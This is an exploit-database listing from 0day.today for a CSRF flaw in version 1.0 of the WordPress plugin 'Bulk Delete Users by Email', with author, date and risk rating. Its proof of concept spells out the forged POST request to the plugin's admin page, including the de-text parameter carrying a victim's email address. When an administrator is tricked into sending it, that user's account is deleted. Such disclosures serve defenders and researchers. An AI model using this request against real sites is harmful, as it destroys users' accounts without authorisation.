[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wordpress Bulk Delete Users by Email Plugin 1.0 - CSRF Vulnerability

Author
Fikri Fadzil
Risk
[
Security Risk Low
]
0day-ID
0day-ID-22609
Category
web applications
Date add
08-09-2014
Platform
php
# Exploit Title: Bulk Delete Users by Email, Wordpress Plugin 1.0 - CSRF
# Google Dork: N/A
# Date: 05.09.2014
# Exploit Author: Fikri Fadzil - fikri.fadzil@impact-alliance.org
# Vendor Homepage - http://www.speakdigital.co.uk/
# Software Link: https://wordpress.org/plugins/bulk-delete-users-by-email/
# Version: 1.0
# Tested on: PHP
 
 
Description:
This plugin will allow administrator to delete user(s) account by entering
their email address.
 
Proof of Concept
1. Force the administrator to send below request:
 
URL :
http://localhost/blog/wp-admin/admin.php?page=bulk-delete-users-by-email/plugin.php
METHOD : POST
REQUEST : de-text=<victim email>&submit=Search+and+Delete
 
* As the result, user with the given email address will be deleted.

#  0day.today [2024-11-15]  #